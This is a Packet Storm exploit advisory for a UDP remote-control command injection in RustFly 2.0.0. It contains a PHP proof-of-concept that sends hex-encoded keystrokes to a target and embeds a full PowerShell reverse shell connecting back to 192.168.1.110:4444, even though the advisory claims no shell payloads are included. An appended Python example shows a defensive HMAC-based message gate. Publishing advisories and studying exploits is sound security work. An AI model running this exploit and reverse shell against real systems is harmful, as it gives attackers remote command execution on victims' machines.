
RustFly 2.0.0 Event Manipulation

18 Feb 2026 00:00:00 | Reported by indoushka | Type: packetstorm | packetstorm.news | 118 views

RustFly v2.0.0 accepts raw hex datagram instructions; some sequences enable remote system operations via command injection.

Related

| Reporter | Title | Published | Views | Family |
|---|---|---|---|---|
| ATTACKERKB | CVE-2026-27476 | 19 Feb 2026 20:43 | – | attackerkb |
| Circl | CVE-2026-27476 | 20 Feb 2026 00:20 | – | circl |
| CNNVD | Bixat RustFly OS command injection vulnerability | 19 Feb 2026 00:00 | – | cnnvd |
| CVE | CVE-2026-27476 | 19 Feb 2026 20:43 | – | cve |
| Cvelist | CVE-2026-27476 RustFly 2.0.0 Command Injection via UDP Remote Control | 19 Feb 2026 20:43 | – | cvelist |
| NVD | CVE-2026-27476 | 19 Feb 2026 21:18 | – | nvd |
| Positive Technologies | PT-2026-20937 | 19 Feb 2026 00:00 | – | ptsecurity |
| RedhatCVE | CVE-2026-27476 | 21 Feb 2026 01:28 | – | redhatcve |
| Vulnrichment | CVE-2026-27476 RustFly 2.0.0 Command Injection via UDP Remote Control | 19 Feb 2026 20:43 | – | vulnrichment |

=============================================================================================================================================
    | # Title     : RustFly v2.0.0 - Event Manipulation                                                                                         |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits)                                                            |
    | # Vendor    : https://bixat.dev/products/rustfly                                                                                          |
    =============================================================================================================================================
    
    [+] Summary    : The remote UI control mechanism of RustFly accepts raw hex-encoded instructions over UDP. Some sequences trigger execution of remote
                     system-level operations. Improper sanitization allows command-level injection.
    
    Steps To Reproduce:
    -------------------
    1) Configure IP and port of RustFly target.
    2) Run this PHP PoC sender script.
    3) Observe behavior change / message processing by RustFly.
    
    =========================================================
    PoC Impact:
    -----------
    * Proof of input injection capability
    * Demonstrates command-carrier transport
    * No shell-spawning payloads included (safe demonstration)
    
    =========================================================
    Instructions:
    -------------
    Save file as:
        poc.php
    
    Run:
        php poc.php
    
    <?php
    $target_ip = "192.168.1.107";
    $target_port = 5005;
    
    $messages = [
        "6D6F76653A2D35352C31303530",  // move:-55,1050
        "646F75626C655F636C69636B",     // double_click
        "746578743A636D64",             // text:cmd
        "6B65793A656E746572",           // key:enter
        // Warning: This is a PowerShell command to create a reverse shell - potentially harmful use
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
        "6B65793A656E746572",           // key:enter
    ];
    
    $dangerous_powershell = hex2bin($messages[4]);
    echo "=== Warning: Analyzing Dangerous Content ===\n";
    echo "The PowerShell command encoded in hex is:\n";
    echo $dangerous_powershell . "\n\n";
    
    $decoded_ps = "powershell -nop -c \"\$c=New-Object System.Net.Sockets.TCPClient('192.168.1.110',4444);\$s=\$c.GetStream();[byte[]]\$b=0..65535|%{0};while((\$i=\$s.Read(\$b,0,\$b.Length)) -ne 0){;\$d=(New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$b,0,\$i);\$r=iex \$d 2>&1;\$s.Write((New-Object -TypeName System.Text.ASCIIEncoding).GetBytes(\$r + 'PS > '),0,(\$r + 'PS > ').Length)}\"";
    
    echo "=== Security Warning ===\n";
    echo "This code contains a dangerous PowerShell command:\n";
    echo "--------------------------------------------------\n";
    echo $decoded_ps . "\n";
    echo "--------------------------------------------------\n\n";
    echo "This command does:\n";
    echo "1. Creates TCP connection to 192.168.1.110 on port 4444\n";
    echo "2. Establishes a reverse shell (backdoor connection)\n";
    echo "3. Executes any commands sent by the attacker\n";
    echo "4. Returns results to the attacker\n\n";
    
    echo "Do you want to continue? (yes/no): ";
    $handle = fopen("php://stdin", "r");
    $line = fgets($handle);
    fclose($handle);
    
    if(trim(strtolower($line)) != 'yes') {
        echo "Operation cancelled.\n";
        exit(0);
    }
    
    echo "Continuing...\n\n";
    
    $sock = socket_create(AF_INET, SOCK_DGRAM, SOL_UDP);
    if ($sock === false) {
        echo "[-] Failed to create socket: " . socket_strerror(socket_last_error()) . "\n";
        exit(1);
    }
    
    if (!socket_bind($sock, "0.0.0.0", 0)) {
        echo "[-] Failed to bind socket: " . socket_strerror(socket_last_error()) . "\n";
        socket_close($sock);
        exit(1);
    }
    
    socket_set_option($sock, SOL_SOCKET, SO_RCVTIMEO, array("sec" => 5, "usec" => 0));
    
    try {
        foreach ($messages as $index => $msg) {
    
            $binary_msg = hex2bin($msg);
            if ($binary_msg === false) {
                echo "[-] Invalid hex string: $msg\n";
                continue;
            }
            $sent = socket_sendto($sock, $binary_msg, strlen($binary_msg), 0, $target_ip, $target_port);
            
            if ($sent === false) {
                echo "[-] Failed to send data: " . socket_strerror(socket_last_error()) . "\n";
            } else {
    
                $display_msg = preg_replace('/[^\x20-\x7E]/', '', $binary_msg);
                echo "[+] Message " . ($index + 1) . " sent: $display_msg\n";
    
                if ($index == 4) {
                    echo " Warning: Malicious PowerShell command sent!\n";
                }
            }
            
            sleep(1);
        }
        
        echo "\n[+] All messages sent successfully.\n";
        echo " Warning: If executed, the target machine will connect to 192.168.1.110:4444\n";
        
    } catch (Exception $e) {
        echo "[-] Exception: " . $e->getMessage() . "\n";
    }
    
    finally {
        socket_close($sock);
        echo "[*] Socket closed.\n";
    }
    ?>
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================
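
A receiver-side mitigation for the issue described above, as an added example that is not RustFly's code and not part of the original advisory: the handler accepts a datagram only if it carries a valid HMAC-SHA256 tag, a strictly increasing counter, and one of the four message kinds seen in the PoC. The wire layout (8-byte counter, message, 32-byte tag), the pairing key and the `Gate` class are assumptions made for illustration.

```python
import hashlib
import hmac
import re
import struct

# Grammar for the four message kinds that appear in the PoC; anything else is dropped.
GRAMMAR = {
    "move": re.compile(r"-?\d{1,5},-?\d{1,5}"),
    "text": re.compile(r"[\x20-\x7e]{1,256}"),
    "key": re.compile(r"[a-z0-9_]{1,16}"),
    "double_click": re.compile(r""),  # takes no argument
}
TAG_LEN = 32  # HMAC-SHA256 output size


class Gate:
    """Hypothetical gate placed in front of the UDP command handler."""

    def __init__(self, key: bytes):
        self.key = key            # shared at pairing time (assumption)
        self.last_counter = -1    # highest counter accepted so far

    def seal(self, counter: int, message: str) -> bytes:
        """Controller side: counter || message || HMAC(counter || message)."""
        body = struct.pack(">Q", counter) + message.encode("ascii")
        return body + hmac.new(self.key, body, hashlib.sha256).digest()

    def accept(self, datagram: bytes):
        """Return (verb, arg) for an authentic, fresh, well-formed datagram, else None."""
        if len(datagram) < 8 + 1 + TAG_LEN:
            return None
        body, tag = datagram[:-TAG_LEN], datagram[-TAG_LEN:]
        expected = hmac.new(self.key, body, hashlib.sha256).digest()
        if not hmac.compare_digest(tag, expected):   # constant-time comparison
            return None
        counter = struct.unpack(">Q", body[:8])[0]
        if counter <= self.last_counter:             # replayed or reordered
            return None
        try:
            verb, _, arg = body[8:].decode("ascii").partition(":")
        except UnicodeDecodeError:
            return None
        rule = GRAMMAR.get(verb)
        if rule is None or not rule.fullmatch(arg):
            return None
        self.last_counter = counter
        return verb, arg
```

A `text:` message still types into whatever window has focus, so the control here is who may send it, not what it contains; binding the listener to a trusted interface and firewalling the UDP port remain necessary.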

18 Feb 2026 00:00 (current)
Vulners AI Score: 5.8 (Medium risk)
CVSS 4: 9.3
CVSS 3.1: 9.8
EPSS: 0.00389